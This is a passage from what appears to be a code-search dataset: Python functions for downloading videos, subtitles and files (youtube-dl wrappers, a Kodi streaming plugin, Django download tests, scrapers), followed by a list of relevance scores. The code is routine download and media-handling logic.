e:\n print(\"Exiting\")\n logfile.close()\n\n logfile.close()", "def download(self, url: str, dest: PathLike, force: bool = False):", "def __init__(self, download_time):\n self._ies = []\n #self._pps = []\n self._download_retcode = 0\n self._num_downloads = 0\n if (config_pytomo.LOG_FILE == '-') or (not config_pytomo.LOG_FILE):\n self._screen_file = sys.stdout\n elif config_pytomo.LOG_FILE_TIMESTAMP:\n # I don't like it this way...\n self._screen_file = open(config_pytomo.LOG_FILE_TIMESTAMP, 'a')\n else:\n # not very good\n 
self._screen_file = sys.stdout\n self.state = BUFFERING_STATE\n self.accumulated_playback = 0.0\n self.accumulated_buffer = 0.0\n self.current_buffer = 0.0\n self.interruptions = 0\n self.current_time = None\n self.start_playback = None\n self.encoding_rate = None\n self.data_len = None\n self.data_duration = None\n self.max_instant_thp = None\n self.video_type = None\n self.redirect_url = None\n self.initial_data = None\n self.initial_rate = None\n self.initial_playback_buffer = None\n self.flv_timestamp = None\n self.previous_timestamp = None\n self.time_to_get_first_byte = None\n try:\n self.download_time = int(download_time)\n except ValueError:\n config_pytomo.LOG.exception(\n \"Please provide a number as max download time. Got : %s\",\n download_time)\n self.download_time = config_pytomo.DOWNLOAD_TIME\n config_pytomo.LOG.info('Set max download_time as: %d',\n self.download_time)\n if self.download_time <= 0:\n self.download_time = config_pytomo.MAX_DOWNLOAD_TIME\n config_pytomo.LOG.debug('Max download_time is: %d',\n self.download_time)\n #self.quiet = quiet\n #self.params = params'", "def test_techtv_video_download_nofiles(logged_in_client, is_public, mocker):\n mocker.patch(\"ui.views.redirect\")\n client, _ = logged_in_client\n client.logout()\n ttv_video = TechTVVideoFactory(video=VideoFactory(is_public=is_public))\n assert ttv_video.video.download is None\n url = reverse(\"techtv-download\", kwargs={\"video_key\": ttv_video.ttv_id})\n result = client.get(url)\n assert result.status_code == status.HTTP_404_NOT_FOUND", "def play_video(path):\r\n #logger.info(\"######: {}, log: {}########\".format('rk8', path))\r\n #original=https://api.hotstar.com/h/v1/play?contentId=1000238814\r\n #path=\"https://api.hotstar.com/h/v2/play/in/contents/1000238814\"\r\n # Create a playable item with a path to play.\r\n data = make_request(path)\r\n #logger.info(\"######: {}, log: {}########\".format('rk3', path))\r\n if not data:\r\n return\r\n\r\n def get_subtitle(url):\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 265b9dab22d4e9a033e6df6f89639f17/master.m3u8?hdnea=st=1560107863~exp=1560111463~acl=\r\n # /*~hmac=2f6fb393159ed5fa1b12bbf12e954eb377cfa0fc852d4ff5eb24446233237620\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 5d0f83c3ccbf4501cf952bdfc8c0d785/subtitle/lang_en/sub-0.vtt\r\n #\r\n _url = urlparse(url)\r\n values = _url._asdict()\r\n values['query'] = ''\r\n values['path'] = '{}/subtitle/lang_en/sub-0.vtt'.format(\"/\".join(values['path'].split('/')[:-1]))\r\n\r\n subtitle_url = ParseResult(**values).geturl()\r\n # subtitle_file = kodiutils.download_url_content_to_temp(subtitle_url, '{}-{}.srt'.format(\r\n # Zee5Plugin.safe_string(item['title']),\r\n # subtitle_lang,\r\n # ))\r\n\r\n return subtitle_url\r\n\r\n #logger.info(\"######: {}, log: {}########\".format('rk6', data))\r\n #item = data['body']['results']['item']\r\n item=data['body']['results']['playBackSets'][0]\r\n path = item['playbackUrl']\r\n licenseURL = item.get('licenseUrl')\r\n subtitle = get_subtitle(path)\r\n\r\n logger.info('Playing video URL: {}, licenseURL: {}, subtitle: {}'.format(path, licenseURL, subtitle))\r\n\r\n play_item = xbmcgui.ListItem(path=path)\r\n if licenseURL:\r\n play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')\r\n play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')\r\n play_item.setMimeType('application/dash+xml')\r\n play_item.setContentLookup(False)\r\n\r\n 
play_item.setSubtitles([get_subtitle(path)])\r\n\r\n # Pass the item to the Kodi player.\r\n xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)", "def download(self, language, filename, filetype):\n if language not in self.languages.keys():\n print \"Theres's no subtitle in this language\"\n sys.exit()\n url = \"http://www.youtube.com/api/timedtext?v={0}&lang={1}\".format(self.video_id, language)\n self.subtitle = urllib2.urlopen(url)\n if filetype == \"srt\":\n self.writeSRTFile(filename)\n else:\n self.writeXMLFile(filename)", "def downloadFile()-> None:\n logging.info(f\"Downloading current data set {getTime()}\")\n with open(DATA_FILE,\"wb\") as f:\n f.write(get(\"https://covid.ourworldindata.org/data/owid-covid-data.csv\").text.encode())\n logging.info(f\"Finished Downloading current data set {getTime()}\")", "def downloader(urls, path):\n counter = 1\n for media_file in urls:\n # Create the file name\n file_name = \"meme\" + str(counter) + \".jpg\"\n file_location = path + \"/\" + file_name\n print(f\"Downloading {media_file} as {file_name}.\")\n # Overwrite files\n if os.path.exists(file_location):\n os.remove(file_location)\n print(f\"{file_name} will overwrite an existing file of the same name.\")\n wget.download(media_file, out=file_location)\n print(\"\\n\")\n counter += 1\n print(f\"{counter - 1} items were downloaded.\")\n return counter - 1", "async def download(self, ctx, *, song):\n try:\n with youtube_dl.YoutubeDL(ytdl_download_format_options) as ydl:\n if \"https://www.youtube.com/\" in song:\n download = ydl.extract_info(song, True)\n else:\n infosearched = ydl.extract_info(\n \"ytsearch:\"+song, False)\n download = ydl.extract_info(\n infosearched['entries'][0]['webpage_url'], True)\n filename = ydl.prepare_filename(download)\n embed = discord.Embed(\n title=\"Your download is ready\", description=\"Please wait a moment while the file is beeing uploaded\")\n await ctx.send(embed=embed, delete_after=30)\n await ctx.send(file=discord.File(filename))\n os.remove(filename)\n except (youtube_dl.utils.ExtractorError, youtube_dl.utils.DownloadError):\n embed = discord.Embed(title=\"Song couldn't be downloaded\", description=(\"Song:\"+song))\n await ctx.send(embed=embed)", "def death_as_a_service(vid_path='vids', max_downloads=4,\n to_imgur=False, to_tumblr=True, to_snapchat=True):\n print \"Fetching new videos and consolidating queue...\"\n yt.populate_queue()\n yt.dl(max_downloads)\n extract_and_upload(vid_path, to_imgur=to_imgur,\n to_tumblr=to_tumblr, to_snapchat=to_snapchat)", "def download_course_given(self, course_url: str):\n self.course_url = course_url\n self.get_course_page()\n self.get_course_title()\n self.get_course_unit_titles()\n self.get_course_unit_slugs()\n self.get_course_unit_urls()\n\n print(\"\\nGenerating Path Slugs...\\n\")\n self.get_course_all_slugs()\n self.get_course_youtube_ids()\n self.download_course_videos()", "def save_link_time(return_list, path_to_download):\n\n # Opens a new file and writes lines to it and saves it at the spot provided\n with open(os.path.join(path_to_download, \"yt_vids.txt\"), \"w\") as w:\n w.write('\\n'.join('{} {} {}'.format(\n x[0], x[1][0], x[1][1]) for x in return_list))", "def getDownload(self, html, episode_number):\n soup = BeautifulSoup(html, \"html.parser\")\n download = soup.find_all('source')\n if download:\n self.downloads[\"Episode %s.mp4\" % str(episode_number)] = download[0]['src']\n return\n\n print(\"[!] 
Download link not found for episode %s\" % str(episode_number))", "def download_link(url,save_dir):\n global downloaded_links\n global urlcnt\n if url in downloaded_links.keys(): return None\n m = re.search('\\?id=([a-zA-Z0-9.]+)', url)\n unique_name = m.group(1)\n unique_name = unique_name.replace(\".\",\"_\")\n text_name = unique_name + \".txt\"\n html = urlopen(url).read()\n text_file = open(save_dir + \"/{0}\".format(text_name),\"w\")\n urlcnt += 1\n text_version = get_gp_text_description(html)\n text_file.write(text_version)\n text_file.close()\n downloaded_links[url] = True\n print(\"Downloaded {0} and saved it in '{1}' as {2}\".format(url, save_dir, unique_name))\n return html", "def extract_videos(download_dir, extract_dir):\n\n filename = os.path.join(download_dir, 'UCF101.rar')\n patoolib.extract_archive(filename, outdir=extract_dir)\n\n # os.remove(filename)\n\n return None", "def downloadHttpFileAtTime(outputDir, urlPartsQ, cameraID, closestTime, verboseLogs):\n imgPath = getImgPath(outputDir, cameraID, closestTime)\n if verboseLogs:\n logging.warning('Local file %s', imgPath)\n if os.path.isfile(imgPath):\n logging.warning('File %s already downloaded', imgPath)\n return imgPath\n\n closestFile = str(closestTime) + '.jpg'\n urlParts = urlPartsQ[:] # copy URL parts array\n urlParts.append(closestFile)\n # logging.warning('File URLparts %s', urlParts)\n url = '/'.join(urlParts)\n logging.warning('File URL %s', url)\n\n # urllib.request.urlretrieve(url, imgPath)\n resp = requests.get(url, stream=True)\n with open(imgPath, 'wb') as f:\n for chunk in resp.iter_content(chunk_size=8192):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n resp.close()\n return imgPath", "def mp4_url(self) -> str:\n\t\treturn 'video.mp4?oid={0}'.format(self._oid)", "def download_videos(self, path, since=None, camera=\"all\", stop=10, debug=False):\n if since is None:\n since_epochs = self.last_refresh\n else:\n parsed_datetime = parse(since, fuzzy=True)\n since_epochs = parsed_datetime.timestamp()\n\n formatted_date = get_time(time_to_convert=since_epochs)\n _LOGGER.info(\"Retrieving videos since %s\", formatted_date)\n\n if not isinstance(camera, list):\n camera = [camera]\n\n for page in range(1, stop):\n response = api.request_videos(self, time=since_epochs, page=page)\n _LOGGER.debug(\"Processing page %s\", page)\n try:\n result = response[\"media\"]\n if not result:\n raise IndexError\n except (KeyError, IndexError):\n _LOGGER.info(\"No videos found on page %s. 
Exiting.\", page)\n break\n\n self._parse_downloaded_items(result, camera, path, debug)", "def test_video_download_nofiles(logged_in_client, is_public, mocker):\n mocker.patch(\n \"ui.views.redirect\", return_value=HttpResponseRedirect(redirect_to=\"/\")\n )\n client, _ = logged_in_client\n client.logout()\n video = VideoFactory(is_public=is_public)\n assert video.download is None\n url = reverse(\"video-download\", kwargs={\"video_key\": video.hexkey})\n result = client.get(url)\n assert result.status_code == status.HTTP_404_NOT_FOUND", "def ytd(title, url ):\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'm4a',\n # 'preferredquality': '192',\n }],\n 'progress_hooks': [download_hook],\n 'outtmpl': title + '.%(ext)s',\n }\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n return(title + \".m4a\")", "def download_feed_item(feed_item, base_directory):\n join_path = partial(os.path.join, base_directory)\n\n base_filename = base_filename_for_feed_item(feed_item)\n\n json_filename = join_path(\"{}.json\".format(base_filename))\n\n if os.path.exists(json_filename):\n # Stop here, we already have this video.\n return\n\n content = highest_quality_content(\n download_info_for_feed_item(feed_item)\n )\n\n video_content = (\n content[0]\n if isinstance(content, tuple) else\n content\n )\n\n assert video_content.media_type.has_video\n\n video_filename = join_path(\"{}.{}\".format(\n base_filename, video_content.media_type.file_type\n ))\n\n if os.path.exists(video_filename):\n # Delete the video file if it's there already.\n os.remove(video_filename)\n\n if isinstance(content, tuple):\n # Download video and audio at the same time.\n que = Queue()\n exception_queue = Queue()\n\n def download_in_queue():\n try:\n download_to_file(*que.get())\n except Exception as ex:\n exception_queue.put(ex)\n\n # TODO: It would be nice to be able to terminate the other\n # thread here.\n\n if isinstance(ex, (KeyboardInterrupt, SystemExit)):\n # Re-raise interrupts so cleanup code works.\n raise ex\n finally:\n que.task_done()\n\n temp_video_filename = tempfile.mkstemp(prefix= base_filename)[1]\n temp_audio_filename = tempfile.mkstemp(prefix= base_filename)[1]\n\n try:\n que.put((content[0].url, temp_video_filename))\n que.put((content[1].url, temp_audio_filename))\n\n for i in range(2):\n Thread(target= download_in_queue).start()\n\n que.join()\n\n if not exception_queue.empty():\n raise exception_queue.get()\n\n # Now use ffmpeg to join the audio and video content together.\n subprocess.check_call((\n \"ffmpeg\",\n \"-i\", temp_video_filename,\n \"-i\", temp_audio_filename,\n \"-c\", \"copy\", os.path.abspath(video_filename)\n ))\n finally:\n # Clean up temporary files.\n os.remove(temp_video_filename)\n os.remove(temp_audio_filename)\n else:\n # Download one audio-video file.\n download_to_file(video_content.url, video_filename)\n\n # Now write the JSOn file with the metadata.\n with open(json_filename, \"w\") as out_file:\n json.dump({\n \"version\": JSON_FORMAT_VERSION,\n \"content\": (\n [content[0].to_json(), content[1].to_json()]\n if isinstance(content, tuple) else\n [content.to_json()]\n ),\n \"feed_item\": feed_item.to_json(),\n }, out_file)\n\n return (video_filename, json_filename)", "def download_file():\n for lines in urls:\n try:\n req.urlretrieve(lines, '{0}/{1}'.format(folder_path, lines.split('/')[-1]))\n time.sleep(1)\n print ('File - {} - downloaded successfully'.format(lines.split('/')[-1]))\n except 
urllib.error.HTTPError:\n print('File is missing or not reachable')\n print('Download Complete & Successful!')", "def process_download_flv(self, data, meta_file_name, connection_time):\n # content-length in bytes\n self.data_len = float(data.info().get('Content-length', None))\n config_pytomo.LOG.debug('Content-length: %s' % self.data_len)\n #meta_file = open(meta_file_name, 'ab')\n meta_file = open(meta_file_name, 'ab+')\n flv_tags = tags.FLV(meta_file)\n self._total_bytes = 0\n #nb_zero_data = 0\n self.state = INITIAL_BUFFERING_STATE\n #block_size = 1024\n block_size = 1\n start = time.time()\n config_pytomo.LOG.debug('start time: %s' % start)\n while True:\n # Download and write\n before = time.time()\n if (before - start) > self.download_time:\n config_pytomo.LOG.debug('Downloaded video during %i seconds, '\n 'stopping' % (before - start))\n break\n # read in bytes\n data_block = data.read(block_size)\n if not self.time_to_get_first_byte:\n first_byte_time = time.time()\n self.time_to_get_first_byte = first_byte_time - connection_time\n block_size = 1024\n data_block_len = len(data_block)\n if data_block_len == 0:\n config_pytomo.LOG.debug('\\nFinished downloading video')\n break\n write_no_seek(meta_file, data_block)\n self._total_bytes += data_block_len\n self.update_with_tags(flv_tags)\n after = time.time()\n if not self.data_duration:\n try:\n self.data_duration = get_data_duration(meta_file_name)\n except ParseError, mes:\n config_pytomo.LOG.info('data duration not yet found: %s'\n % mes)\n self.current_time = after - start\n time_difference = after - before\n self.update_state(time_difference)\n block_size = self.best_block_size(time_difference, data_block_len)\n instant_thp = (8e-3 * data_block_len / (time_difference)\n if (time_difference) != 0 else None)\n if time_difference > MAX_TH_MIN_UPDATE_TIME:\n self.max_instant_thp = max(self.max_instant_thp, instant_thp)\n meta_file.close()\n return after - start", "def getMP4DownloadLink(self):\n context = aq_inner(self.context)\n extension = '?e=.mp4'\n return context.absolute_url() + '/downloadMP4' + extension", "def download(all):\n print(\"Downloading\")", "def movieid_first_video_url(self, movie_id):\n YOUTUBE_URL = \"https://www.youtube.com/watch?v=\"\n VIDEOS_URL = \"https://api.themoviedb.org/3/movie/%s/videos\"\n url_with_movieid = VIDEOS_URL % (movie_id)\n parm_dict = {\"api_key\": self.api_key, \"language\": self.language}\n url = url_with_movieid + \"?\" + urlencode(parm_dict, doseq=True)\n # print url\n\n response = requests.get(url)\n json_dict = json.loads(response.text)\n response.close()\n\n youtube_video_key = json_dict['results'][0]['key']\n return YOUTUBE_URL + youtube_video_key", "def spider(given_url):\n \n url_to_crawl = given_url\n\n source_code = requests.get(url_to_crawl)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n # name = soup.find('h1', {'class': 'pl-header-title'})\n # name = name.string\n # name = str(name)\n # name = name.strip('')\n # fw = open('links of' + name + '.txt', 'w')\n # fw2 = open('names of' + name + '.txt', 'w')\n fw = open('links.txt', 'w')\n fw2 = open('names.txt', 'w')\n for link in soup.findAll('a', {'class': 'pl-video-title-link yt-uix-tile-link yt-uix-sessionlink spf-link '}):\n my_href = 'https://www.youtube.com' + link.get('href')\n title = link.string\n #print(my_href, title)\n fw.write(my_href + '\\n')\n fw2.write(title)\n\n fw.close()\n fw2.close()\n\n \"\"\"Downloading Part\"\"\"\n try:\n os.system(\"youtube-dl --max-quality FORMAT -a links.txt\")\n 
return\n except:\n print(\"Something went wrong related to downloading\")\n exit(2)", "def download(server):\n for i in range(10):\n start_time = time.time()\n logging.debug('Start downloading: %d' % i)\n os.system(\"scp %s:18DOWNLOAD downloads/\" % server)\n end_time = time.time()\n logging.debug('End downloading...')\n logging.debug('Time taken by downloader: %s' % (end_time - start_time))", "def download_files(self):", "def yt_url(url, print_title=0):\n try:\n p = pafy.new(url)\n\n except (IOError, ValueError) as e:\n g.message = c.r + str(e) + c.w\n g.content = g.content or generate_songlist_display(zeromsg=g.message)\n return\n\n g.browse_mode = \"normal\"\n v = Video(p.videoid, p.title, p.length)\n g.model.songs = [v]\n\n if not g.command_line:\n g.content = generate_songlist_display()\n\n if print_title:\n xprint(v.title)", "def displayVideoStill(request, flightName=None, time=None, thumbnail=False, isDownload=0):\n noImagePath = \"%s/xgds_video/images/NoImage.png\" % settings.STATIC_ROOT\n noImageThumbnailPath = \"%s/xgds_video/images/NoImage.thumbnail.png\" % \\\n settings.STATIC_ROOT\n\n if not settings.XGDS_VIDEO_STILLS_ENABLED:\n if thumbnail:\n return buildImageResponse(noImageThumbnailPath, noImageThumbnailPath)\n else:\n return buildImageResponse(noImagePath, noImagePath)\n\n try:\n requestedTime = datetime.datetime.strptime(time, \"%Y-%m-%d_%H-%M-%S\")\n except:\n try:\n requestedTime = datetime.datetime.strptime(time, \"%Y-%m-%d %H-%M-%S+00:00\")\n except:\n requestedTime = datetime.datetime.strptime(time, \"%Y-%m-%d %H:%M:%S+00:00\")\n\n thumbnailPath = \"%s/%s_%s.thumbnail.jpg\" % (settings.IMAGE_CAPTURE_DIR, flightName, time)\n fullSizePath = \"%s/%s_%s.jpg\" % (settings.IMAGE_CAPTURE_DIR, flightName, time)\n\n # We generate full image and thumbnail together, so one check for \n # existence should be OK. 
If we don't find it, we generate one and cache it\n if not os.path.isfile(fullSizePath):\n captureStillImage(flightName, requestedTime)\n\n # The image should now be there, but just in case, we catch exceptions\n if thumbnail:\n thePath = thumbnailPath\n default = noImageThumbnailPath\n else:\n thePath = fullSizePath\n default = noImagePath\n response = buildImageResponse(thePath, default)\n if isDownload:\n response['Content-disposition'] = 'attachment; filename=%s' % os.path.basename(fullSizePath)\n return response", "def download_url(url, destination_filename=None, progress_updater=None, \n force_download=False, verbose=True):\n \n if progress_updater is not None and isinstance(progress_updater,bool):\n if not progress_updater:\n progress_updater = None\n else:\n progress_updater = DownloadProgressBar()\n \n url_no_sas = url.split('?')[0]\n \n if destination_filename is None:\n target_folder = get_temp_folder()\n url_without_sas = url.split('?', 1)[0]\n \n # This does not guarantee uniqueness, hence \"semi-best-effort\"\n url_as_filename = re.sub(r'\\W+', '', url_without_sas)\n n_folder_chars = len(ai4e_utils_temp_dir)\n if len(url_as_filename) + n_folder_chars > max_path_len:\n print('Warning: truncating filename target to {} characters'.format(max_path_len))\n url_as_filename = url_as_filename[-1*(max_path_len-n_folder_chars):]\n destination_filename = \\\n os.path.join(target_folder,url_as_filename)\n \n if (not force_download) and (os.path.isfile(destination_filename)):\n if verbose:\n print('Bypassing download of already-downloaded file {}'.format(os.path.basename(url_no_sas)))\n else:\n if verbose:\n print('Downloading file {} to {}'.format(os.path.basename(url_no_sas),destination_filename),end='')\n urllib.request.urlretrieve(url, destination_filename, progress_updater) \n assert(os.path.isfile(destination_filename))\n nBytes = os.path.getsize(destination_filename)\n if verbose:\n print('...done, {} bytes.'.format(nBytes))\n \n return destination_filename", "def downloadSong(self, song, outputFolder=\"\", outputFunction=None, writeJSON=True):\n\n \"\"\"\n -x: Extract audio\n --audio-format: sets the audio format from ogg to mp3\n --audio-quality: 0 is best\n --write-info-json: Writes the DASH information for the downloaded video to the filename with .info.json appended\n \"\"\"\n audioOptions = self.audioOptions.copy() # Generate a shallow copy of our object's options\n if writeJSON:\n audioOptions[\"--write-info-json\"] = True\n audioOptions.update(settings[\"youtubeSettings\"])\n\n self.youtubeLock.acquire() # Wait the requisite amount of time\n log.debug(\"Downloading Song '{}'\".format(song))\n obj = subprocess.Popen(\n [settings[\"youtube_dl\"]] + # Executable\n self.flattenDict(audioOptions) + #Turn the dict items into a list where key is before value. Bools are special. 
If false, not added, otherwise only key\n [\"-o\", os.path.join(outputFolder, settings[\"formatString\"])] + #Output format and folder\n [\"--\", song], #Then add song as input\n **settings[\"pipeOptions\"], #Add in subprocess options\n stdout=subprocess.PIPE #Also this for now\n )\n \n outputText = \"\"\n for line in obj.stdout:\n outputText += line\n match = re.match(r\"\\[download\\]\\s+([\\d.]+)% of \\S+ at\\s+([\\d.]+\\S+)\", line) #Matches the download update lines\n if match:\n percent, downloadRate = match.group(1, 2)\n if callable(outputFunction):\n outputFunction(song, float(percent), downloadRate) #Update this if we have items\n return obj.wait(), outputText # Wait for process to complete and get return code. Also return the whole output printed to stdout", "def soup_process_video(input_url):\r\n # scrape the url\r\n fp = urllib.request.urlopen(input_url)\r\n #read bytes\r\n mybytes = fp.read()\r\n mystr = mybytes.decode(\"utf8\")\r\n fp.close()\r\n soup = BeautifulSoup(mystr,'html.parser')\r\n return (soup.find(\"a\", {'class': \"download-btn\"}).get('href'))", "def download1():\n #t=request.vars.arg(0)\n response.flash=request\n #print request.wsgi.environ['HTTP_REFERER']\n #print 'yghklo=',request.args[0]\n a=db(db.Project.Project_File==request.args[0]).select(db.Project.ALL)\n #a=db(db.Project.id==38).select(db.Project.ALL)\n #if a == None:\n#\t print 'silent'\n # print 'a= aabhas download',a[0].no_of_download, a[0].Project_File\n # if a[0].no_of_download==None:\n#\t a[0].no_download=0\n db(db.Project.Project_File==a[0].Project_File).update(no_of_download=(a[0].no_of_download or 0)+1)\n print 'a.id=',a[0].id\n # print len(a),'\\n'\n #print \"\\n\\n\\n\\n\"\n return response.download(request, db)", "def add_videos(playlist):\n surl = playlist['link']\n # 작은 playlist의 url을 surl에 저장\n soup = get_soup(surl)\n # 작은 플레이리스트의 html 파싱하여 soup에 저장\n print(f\" getting videos for playlist: {playlist['title']}\")\n\n videos = []\n\n # items are list of video a links from list\n items = soup('a', class_='yt-uix-tile-link')\n # a 태그의 class가 'yt-uix-tile-link'인 태그 items에 저장\n # items는 작은 플레이리스트의 동영상 목록들임\n\n # note first part of look get info from playlist page item,\n # and the the last part opens the video and gets more details\n if len(items) > 0:\n for i in items:\n # 각각의 items i에 하나씩 저장\n d = dict()\n vurl = fix_url(i['href'])\n # 동영상 url을 vurl에 저장\n t = i.find_next('span', {'aria-label': True})\n # 동영상의 span 태그 중 aria=label값이 존재하는 것 t에 저장\n # t는 동영상의 재생 시간임\n d['time'] = t.text if t else 'NA'\n # d 딕셔너리에 t저장\n\n d.update(parse_video(vurl))\n videos.append(d)\n # videos에 d를 append\n\n else: # must be only one video\n d = {'time': 'NA'}\n d.update(parse_video(surl))\n videos.append(d)\n\n # add new key to this playlist of list of video infos\n playlist['videos'] = videos\n print()", "def download(self):\n\n # os.open *should* give a thread-safe way to exlusivly open files\n filepath = self.film\n try:\n # os.O_BINARY is only avilable and needed on windows\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY | os.O_BINARY\n except:\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY\n try:\n fd = os.open(filepath, flags)\n except:\n return\n\n try:\n response = self.session.get(self.filmurl, stream=True)\n if response.status_code == 200:\n for chunk in response.iter_content(1024):\n os.write(fd, chunk)\n except:\n # Remove partial img file if request or stream fails\n os.close(fd)\n os.remove(filepath)", "def fetch_youtube_url(search_term, dev_key=None):\r\n in_cache, video_id = 
check_if_in_cache(search_term)\r\n if in_cache:\r\n return YOUTUBE_VIDEO_URL + video_id\r\n if not dev_key:\r\n YOUTUBE_SEARCH_BASE = \"https://www.youtube.com/results?search_query=\"\r\n try:\r\n response = requests.get(YOUTUBE_SEARCH_BASE + search_term).content\r\n html_response = html.fromstring(response)\r\n video = html_response.xpath(\"//a[contains(@class, 'yt-uix-tile-link')]/@href\")\r\n video_id = re.search(\"((\\?v=)[a-zA-Z0-9_-]{4,15})\", video[0]).group(0)[3:]\r\n log.debug(f\"Found video id {video_id} for search term {search_term}\")\r\n _ = save_to_cache(search_term=search_term, video_id=video_id)\r\n return YOUTUBE_VIDEO_URL + video_id\r\n except AttributeError as e:\r\n log.warning(f\"Could not find scrape details for {search_term}\")\r\n capture_exception(e)\r\n return None\r\n except IndexError as e:\r\n log.warning(f\"Could not perform scrape search for {search_term}, got a different HTML\")\r\n capture_exception(e)\r\n return None\r\n else:\r\n youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\r\n developerKey=dev_key,\r\n cache_discovery=False)\r\n try:\r\n in_cache, video_id = check_if_in_cache(search_term)\r\n\r\n if not in_cache:\r\n search_response = youtube.search().list(q=search_term,\r\n part='id, snippet').execute()\r\n for v in search_response['items']:\r\n if v['id']['kind'] == VIDEO:\r\n video_id = v['id']['videoId']\r\n log.debug(f\"Adding Video id {video_id}\")\r\n _ = save_to_cache(search_term=search_term, video_id=video_id) \r\n return YOUTUBE_VIDEO_URL + video_id\r\n except HttpError as err:\r\n err_details = loads(err.content.decode('utf-8')).get('error').get('errors')\r\n secho(\"Couldn't complete search due to following errors: \", fg='red')\r\n for e in err_details:\r\n error_reason = e.get('reason')\r\n error_domain = e.get('domain')\r\n error_message = e.get('message')\r\n\r\n if error_reason == 'quotaExceeded' or error_reason == 'dailyLimitExceeded':\r\n secho(f\"\\tYou're over daily allowed quota. 
Unfortunately, YouTube restricts API keys to a max of 10,000 requests per day which translates to a maximum of 100 searches.\", fg='red')\r\n secho(f\"\\tThe quota will be reset at midnight Pacific Time (PT).\" ,fg='red')\r\n secho(f\"\\tYou can request for Quota increase from https://console.developers.google.com/apis/api/youtube.googleapis.com/quotas.\", fg='red')\r\n else:\r\n secho(f\"\\t Search failed due to {error_domain}:{error_reason}, message: {error_message}\")\r\n return None", "def test_techtv_video_download(logged_in_client, is_public, mocker):\n mock_redirect = mocker.patch(\n \"ui.views.redirect\", return_value=HttpResponseRedirect(redirect_to=\"/\")\n )\n client, _ = logged_in_client\n client.logout()\n ttv_video = TechTVVideoFactory(video=VideoFactory(is_public=is_public))\n VideoFileFactory(video=ttv_video.video, encoding=EncodingNames.ORIGINAL)\n url = reverse(\"techtv-download\", kwargs={\"video_key\": ttv_video.ttv_id})\n result = client.get(url)\n if is_public:\n mock_redirect.assert_called_with(ttv_video.video.download.cloudfront_url)\n else:\n assert result.status_code == status.HTTP_404_NOT_FOUND", "def request_id(self):\n select_id = input(\"\\n>>> \")\n select_dict = [format for format in self.result['formats']\n if format['format_id'] == select_id][0]\n filesize = size(select_dict['filesize']\n ) if select_dict['filesize'] else 0\n # url = select_dict['url']\n print(f\"Downloading {self.result['title']}, size={filesize}\")\n self.title = self.result['title']\n for item in [\"(\", \")\", \" \", \",\", \".\", \"'\"]:\n self.title = self.title.replace(item, '_')\n self.title = self.title.replace('__', '_')\n self.download_video(select_id)", "def start(self):\n if not path.exists(self.dir):\n mkdir(self.dir)\n\n try:\n yt = YouTube(self.link)\n ys = yt.streams\n if self.aud == True:\n ysf = ys.get_audio_only()\n elif self.aud == False:\n ysf = ys.get_by_resolution(resolution=self.res)\n ysf.download(self.dir)\n except AttributeError:\n raise Exception(f\"Resolution [{self.res}] is not available for this video\")\n except excep.RegexMatchError:\n raise Exception(\"Invalid link!\")\n except excep.VideoPrivate:\n raise Exception(\"This video is private! Try with a public one\")\n except excep.PytubeError:\n raise Exception(\"Error occured!\")\n except excep.VideoPrivate:\n raise Exception(\"This video is private! Try with a public one\")\n except excep.VideoUnavailable:\n raise Exception(\"This video is unvailable!\")\n except excep.ExtractError:\n raise Exception(\"Error in extractiong the video!\")\n except Exception:\n raise Exception(\"Error occured. Make sure of your connection ;)\")", "async def youtube(self, ctx, *args):\n if not args:\n await ctx.send(\"usage: `>youtube [search string]`\")\n return\n search_string = \" \".join(args)\n search_string = urllib.parse.urlencode({'search_query': search_string})\n response = requests.get('http://www.youtube.com/results?' 
+ search_string + \"&hl=en_US&app=desktop\")\n if response.status_code == 200:\n search_results = re.findall('href=\\\\\"\\\\/watch\\\\?v=(.{11})', response.content.decode())\n try:\n first_result_url = 'http://www.youtube.com/watch?v=' + search_results[0]\n except IndexError:\n with open('downloads/yt_dump.txt', 'w') as f:\n f.write(response.content.decode())\n #print(response.is_redirect)\n return await ctx.send(\"Found nothing!\")\n await ctx.send(first_result_url)\n self.logger.info(misolog.format_log(ctx, f\"{first_result_url}\"))\n else:\n await ctx.send(\"Error: status code \" + str(response.status_code))\n self.logger.info(misolog.format_log(ctx, f\"error{response.status_code}\"))", "def makeVideo():\n weekNumber = 11\n for _ in range(10):\n df = loadDbIntoDf2('trending')\n df_copy = df.copy()\n df_shorter = selectTop(df_copy,'week',weekNumber , 'trending')\n vid_dl = download(df_shorter,weekNumber)\n merge(vid_dl,weekNumber)\n weekNumber = weekNumber + 1" ]
[ "0.73994005", "0.72689897", "0.7202489", "0.7171504", "0.7060031", "0.6903402", "0.6774965", "0.67710614", "0.67318517", "0.6675659", "0.66156524", "0.66117424", "0.6610987", "0.6610455", "0.6599049", "0.6573128", "0.6570862", "0.6523697", "0.651439", "0.65080476", "0.6456765", "0.6438936", "0.6420223", "0.63628674", "0.6347987", "0.6316836", "0.630469", "0.6295695", "0.6261652", "0.62441987", "0.6240782", "0.62377167", "0.62249035", "0.6218854", "0.61887825", "0.61823463", "0.61735266", "0.6156181", "0.6138414", "0.6074583", "0.60702664", "0.6029479", "0.6005604", "0.599143", "0.5897943", "0.5862752", "0.5839226", "0.5836839", "0.58254516", "0.5782076", "0.57784367", "0.5762937", "0.5751648", "0.57486576", "0.5719397", "0.5713739", "0.5708756", "0.5698091", "0.56788266", "0.5666224", "0.5666109", "0.5632567", "0.5629973", "0.5629735", "0.56011426", "0.5582667", "0.5572083", "0.55652946", "0.55567676", "0.5551311", "0.5549839", "0.55467635", "0.5517811", "0.54941064", "0.54890627", "0.5487537", "0.54616624", "0.5461089", "0.5457112", "0.5396878", "0.5374856", "0.53690976", "0.536876", "0.5367878", "0.5360986", "0.5359349", "0.53581905", 